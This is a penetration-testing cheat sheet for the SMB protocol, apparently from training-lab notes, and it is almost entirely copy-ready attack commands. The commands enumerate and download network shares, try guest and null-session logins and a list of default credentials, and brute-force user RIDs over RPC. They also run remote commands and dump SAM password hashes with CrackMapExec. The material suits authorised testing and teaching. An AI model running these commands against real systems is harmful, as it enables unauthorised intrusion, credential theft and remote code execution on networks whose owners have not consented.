SMB
Introduction
Server Message Block (SMB) is a client-server protocol that regulates access to files and entire directories and other network resources.
The SMB protocol enables the client to communicate with other participants in the same network to access files or services shared with it on the network.
An SMB server can provide arbitrary parts of its local file system as shares.
Access rights are defined by Access Control Lists (ACL).
SMB runs on port 445 TCP by default
SMB Shares Enumeration
Run Snaffler from a Windows host to find useful data in shares:
.\Snaffler.exe -d INLANEFREIGHT.LOCAL -s -v data
Run Scavenger from a Linux host to find useful data in shares:
python3 ./scavenger.py smb -t 10.0.0.10 -u administrator -p Password123 -d testdomain.local
Shares enumeration from Windows:
net view \MachineName /all
CME Shares Enumeration from Linux:
sudo crackmapexec smb 172.16.5.5 -u validuser -p validpassword --shares
CME Share Spidering from Linux:
sudo crackmapexec smb 172.16.5.5 -u validuser -p validpassword -M spider_plus --share sharename
SMBMap Share Enumeration from Linux:
smbmap -u validuser -p validpassword -d INLANEFREIGHT.LOCAL -H 172.16.5.5
SMBMap Share Recursive Directory Listing from Linux
smbmap -u validuser -p validpassword -d INLANEFREIGHT.LOCAL -H 172.16.5.5 -R SHARENAME --dir-only
Download Shares Recursively from Linux:
smbget -u guest -R smb://10.129.8.111/Development/
SMB NULL Session, Guest and Common Credentials Authentication
Guest Authentication:
enum4linux -a -u "guest" -p "" <DC IP>
Guest Authentication:
smbmap -u "guest" -p "" -P 445 -H <DC IP>
Guest Authentication:
smbclient -U '%' -L //<DC IP> && smbclient -U 'guest%' -L //
NULL Session:
smbclient -N -L //<FQDN/IP>
NULL Session:
crackmapexec smb <FQDN/IP> --shares -u '' -p ''
NULL Session:
smbmap -u "" -p "" -P 445 -H <DC IP>
NULL Session:
enum4linux -a -u "" -p "" <DC IP>
Check for common SMB credentials, as listed below
Common SMB Credentials
Source: https://book.hacktricks.xyz/network-services-pentesting/pentesting-smb#possible-credentials
(blank)
(blank)
guest
(blank)
Administrator, admin
(blank), password, administrator, admin
arcserve
arcserve, backup
tivoli, tmersrvd
tivoli, tmersrvd, admin
backupexec, backup
backupexec, backup, arcada
test, lab, demo
password, test, lab, demo
Enumerating SMB via RPC Client
The rpcclient utility offers us many different requests with which we can execute specific functions on the SMB server to get information.
srvinfo
Server information.
enumdomains
Enumerate all domains that are deployed in the network.
querydominfo
Provides domain, server, and user information of deployed domains.
netshareenumall
Enumerates all available shares.
netsharegetinfo
Provides information about a specific share.
enumdomusers
Enumerates all domain users.
queryuser
Provides information about a specific user.
Bruteforcing user RIDs:
Oneliner:
for i in $(seq 500 1100);do rpcclient -N -U "" 10.129.14.128 -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" && echo "";done
Impacket Samrdump:
samrdump.py 10.129.14.128
CrackMapExec (CME) Utilities
Run commands with CrackMapExec
crackmapexec smb 10.10.110.17 -u Administrator -p 'Password123!' -x 'whoami' --exec-method smbexec
Enumerate logged on users with CrackMapExec
crackmapexec smb 10.10.110.0/24 -u administrator -p 'Password123!' --loggedon-users
Extract Hashes from the SAM Database with CrackMapExec
crackmapexec smb 10.10.110.17 -u administrator -p 'Password123!' --sam
Enumerate Password Policies
crackmapexec smb 172.16.5.5 -u validuser -p validpass --pass-pol
Last updated